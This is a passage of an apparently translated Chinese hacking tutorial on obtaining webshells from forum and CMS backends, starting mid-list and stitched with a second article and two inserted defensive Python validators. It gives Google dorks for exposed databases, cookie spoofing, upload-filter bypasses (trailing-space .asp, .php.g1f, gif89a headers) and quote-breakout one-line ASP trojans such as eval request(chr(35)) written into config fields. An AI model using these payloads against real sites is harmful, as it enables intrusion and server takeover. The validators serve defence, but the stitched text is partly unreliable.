10. Directory listing: some websites allow their directories to be listed, so you can request the directory directly.
e.g. http:///shop/admin/
/babyfox/admin/%23bb%23dedsed2s/
In this way we can find the database; I don't need to teach you how to download it.
11. Tool overflow: URL patterns such as .asp?NewsID=, /?id=18, .asp?id= [this method can obtain a large number of webshells]
12. Using search engines:
(1) inurl:flasher_list.asp  Default database: database/  Backend: /manager/
(2) Find the website's admin backend address:
site:: Management (there are many such keywords; look for them yourself)
site:: login
(3) Find Access database, MSSQL and MySQL connection files:
allinurl:bbsdata
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
I'll stop here. Work it out yourself.
13. Spoofing:
Change your ID to the administrator's and also change the MD5 password to his; you can use the Guilin Veteran tool to modify the COOKIE. I won't say more about this.
14. Exploit common vulnerabilities, e.g. in the Dongwang (dvbbs) BBS:
You can first use the dvbbs privilege escalation tool to make yourself a front-end administrator.
Then use the Dongwang pinned-post tool: find a pinned post and obtain the cookies; you have to do this yourself. WSockExpert can be used to capture the cookies, or NC to capture the packet.
I won't go into this further; there are many tutorials online, so go and look at them.
Tools: dvbbs privilege escalation tool, Dongwang pinned-post tool
15. There are still some old holes, for example the source-code disclosure in IIS 3 and 4 and the DELETE method in IIS 5.
I won't talk about CGI or some old PHP holes; they are too old to be of much use.
Three. Summary of ten tips for obtaining a webshell from the backend
Author:  Source: Safety China  Editor: Yuanye  [2006-04-27 09:29]
We have summarized the commonly used methods of obtaining a webshell from the backend; they fall into the following ten aspects...
--------------------------------------------------------------------------------
Preface
I believe everyone harvested a lot of compromised hosts ("broilers") when the upload vulnerability was all over the Internet. It can be said that the vulnerability of not strictly filtering uploaded files was known to everyone. Such vulnerabilities are hard to find now, although it cannot be ruled out that some small websites still have them. When taking a site we often spend a great deal of effort getting the administrator account and password and entering the backend, and although at that point we are only one step away from the website's webshell, many novices are still stuck because they cannot think of a suitable method. We have therefore summarized the commonly used methods of obtaining a webshell from the backend; they fall into the following ten aspects.
Note: How to get into the backend is outside the scope of this article; I won't discuss specific methods, that is for everyone to work out themselves. This article draws on various material from predecessors, for which I express my gratitude here.
1. Upload directly to get webshell
This is fairly common in php and jsp programs. MolyX BOARD is one example: its emoticon management allows uploading a .php file directly; although there is no confirmation, the upload has in fact succeeded, and the uploaded file's URL should be under http://forums/images/smiles/. A while ago the jsp vulnerabilities in the Lianzhong game site and NetEase's jsp system allowed jsp files to be uploaded directly, with the file keeping its original name. The bo-blog backend can directly upload .php files and prompts you with the uploaded file path. The same goes for the vulnerabilities that were very popular a year ago (Dongwang 5.0 and 6.0, and many early whole-site systems): because uploaded files were not strictly filtered, a user could upload a webshell directly to any writable directory on the website and thereby gain administrative control of the site.
2. Add or modify the upload types
Nowadays the upload modules of many script programs do more than allow legal file types: most systems also allow adding upload types. The bbsxp backend can add the asa and AsP types, and the ewebeditor backend can also add the asa type; after the change we can upload a webshell with the asa suffix directly. Another situation is where .asp is filtered but the file type .aspasp can be added to upload and obtain a webshell. In the backend of a php system we can add the upload type .php.g1f; this is a feature of php: as long as the last extension is not a known file type, php will run php.g1f as .php, so you can get the shell. The method for the LeadBbs3.14 backend is: add asp to the upload types, noting that there is a space after the asp, then upload the ASP trojan from the front end; of course you must also add a space after it!
3. Use backend management functions to write a webshell
Upload vulnerabilities have mostly been fixed, but after entering the backend we can also write a webshell by modifying related files. Typical examples are dvbbs6.0, leadbbs2.88 and so on, where you modify the configuration file directly in the backend and write a file with the asp suffix. Another way to obtain a webshell in the LeadBbs3.14 backend is to add a new friendly link and write the Ice Fox minimal trojan in the website-name field; you must enter some characters before and after the trojan. http:\\Website\inc\IncHtm\ is then the shell we want.
4. Use backend management to write a webshell into a configuration file
Use symbols such as "":"// to construct a minimal trojan and write it into the program's configuration file. Programs affected include the joekoe forum, a certain classmate-record program, the Boiling Outlook news system, the COCOON Counter statistics program and so on, as well as many php programs. For example, enter cnhacker@":eval request(chr(35))// as the management email address; in the configuration file it becomes webmail="cnhacker@\":eval request(chr(35))//". Another method is to write cnhacker@"%><%eval request(chr(35))%><%', so that the front and back parts pair up and the minimal trojan runs. <%eval request(chr(35))%> can be connected to with lake2's eval sender or the latest 2006 client. Note that when inserting into the database you must choose the former. For example, in Dongyi 2005, go to Article Center Management - Top Menu Settings - Other Special Effects, insert the one-liner "%> <%execute request("l")%> <%', save the top-column menu parameters successfully, and we get the address http://website/admin/rootclass_menu_config.asp.
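As an added example (not part of the original article), the following Python shows why a setting like the management email in sections 3 and 4 must never be spliced into generated ASP source, and what a hardened setting store looks like. It assumes the config line is VBScript of the form webmail="..."; the literal reader and the sample strings are constructed for this illustration.

```python
import json
import re

# Constructed samples: the first two are the quote-breakout strings the page
# quotes for the management-email field; the third is a benign address.
SAMPLES = [
    'cnhacker@":eval request(chr(35))//',
    'cnhacker@"%><%eval request(chr(35))%><%\'',
    'webmaster@example.com',
]

# Strict allowlist for the one field under discussion: an email address.
EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')

def render_naive_line(webmail):
    """The unsafe pattern from the page: raw value spliced into an ASP source line."""
    return 'webmail="' + webmail + '"'

def render_quote_escaped_line(webmail):
    """Better, but not enough: VBScript's only string escape is a doubled quote."""
    return 'webmail="' + webmail.replace('"', '""') + '"'

def read_vbscript_literal(src):
    """Minimal VBScript string-literal reader: (value, source left after it).
    Shows what the script engine sees once the literal has closed."""
    out, i = [], 1                          # src[0] is the opening quote
    while i < len(src):
        if src[i] == '"':
            if src[i + 1:i + 2] == '"':     # doubled quote -> one literal quote
                out.append('"'); i += 2; continue
            return ''.join(out), src[i + 1:]
        out.append(src[i]); i += 1
    raise ValueError('unterminated literal')

def code_after_literal(webmail, renderer):
    """Text that lands outside the string literal, i.e. would run as code."""
    return read_vbscript_literal(renderer(webmail)[len('webmail='):])[1]

def leaves_asp_block(line):
    """ASP splits on <% and %> before the script engine runs, so a %> inside a
    string literal still ends the code block; quote escaping cannot fix that."""
    return '%>' in line

def save_setting(webmail):
    """Hardened path: validate strictly and store as data, never as source code."""
    if not EMAIL_RE.fullmatch(webmail):
        raise ValueError('rejected: not an email address')
    return json.dumps({'webmail': webmail})
```

The second sample is the one to watch: even with quotes doubled it still carries a %> that closes the ASP block, so the only robust fix is validation plus storing settings as data.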
5. Use backend database backup and restore to obtain a webshell
The main idea is to use the backend's "backup database" or "restore database" function for the Access database: variables such as the "backup database path" are not filtered, so a file with any suffix can be renamed to asp, yielding a webshell. The mssql version of the program reuses the Access version's code directly, so the SQL version is still usable. You can also back up the website's asp files with another suffix such as .txt, which lets you view the page source and learn more about the program, increasing your chances of getting a webshell. In practice you often meet the case where there is no upload function but an asp system is running; use this method to view the source, locate the database, and create an opportunity to insert the trojan into the database. The Dongwang forum has an IP-address database: in the backend IP management you can insert the minimal trojan and back it up as a .asp file. Now a word on breaking upload detection. Many asp programs will report the file as illegal even after the suffix has been changed; prepending gif89a to the header of the .asp file tricks the asp program's suffix detection and lets the upload through. Another variant is to open an image file in Notepad, copy any part of it into the header of the asp file, change the suffix to gif and upload, which also defeats the detection; then back it up as a .asp file and you have your webshell.
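Added example, not from the original article: a Python upload validator covering the extension tricks from section 2 (asa, a trailing space after asp, .php.g1f) together with the gif89a header trick and the unfiltered backup path from section 5. The allowlist, the backup directory and the sample files are assumptions constructed for this illustration.

```python
import posixpath

# Allowlisted upload extensions for an image-upload feature (assumed here).
ALLOWED_EXT = {'gif', 'jpg', 'jpeg', 'png'}

# Magic bytes of the allowlisted types; only a secondary check.
MAGIC = {'gif': (b'GIF87a', b'GIF89a'), 'jpg': (b'\xff\xd8\xff',),
         'jpeg': (b'\xff\xd8\xff',), 'png': (b'\x89PNG\r\n\x1a\n',)}

def upload_extension(filename):
    """Return the allowed extension or None. Every dotted component after the
    base name must be allowlisted, so 'x.php.g1f' (Apache treats each component
    as an extension) and 'x.asa' fail; trailing spaces and dots are stripped so
    'x.asp ' cannot dodge a naive string comparison."""
    name = posixpath.basename(filename.replace('\\', '/')).strip().rstrip(' .').lower()
    parts = name.split('.')
    if len(parts) < 2 or not parts[0]:
        return None
    if any(ext not in ALLOWED_EXT for ext in parts[1:]):
        return None
    return parts[-1]

def accept_upload(filename, data):
    """Primary gate: extension allowlist. Magic bytes are a second opinion only,
    since a GIF89a prefix is trivial to prepend to script text (the page's trick)."""
    ext = upload_extension(filename)
    if ext is None or not data.startswith(MAGIC[ext]):
        return None
    return ext

def backup_target(requested, backup_dir='/srv/app/backups'):
    """Admin 'backup database to' parameter: keep only a plain base name, confine
    it to backup_dir and force the .mdb extension, whatever the request carried."""
    base = posixpath.basename(requested.replace('\\', '/')).strip()
    stem = base.split('.')[0]
    if not stem or not stem.replace('_', '').replace('-', '').isalnum():
        raise ValueError('bad backup name')
    return posixpath.join(backup_dir, stem + '.mdb')

# Constructed sample uploads (script body replaced with a placeholder).
JPEG = b'\xff\xd8\xff\xe0' + b'\x00' * 16
SCRIPT_WITH_GIF_HEADER = b'GIF89a' + b'<% script body omitted %>'
```

A .gif name with a script body still passes the content check, which is exactly why the extension allowlist and storing uploads where the server does not execute scripts are the primary controls, not magic bytes.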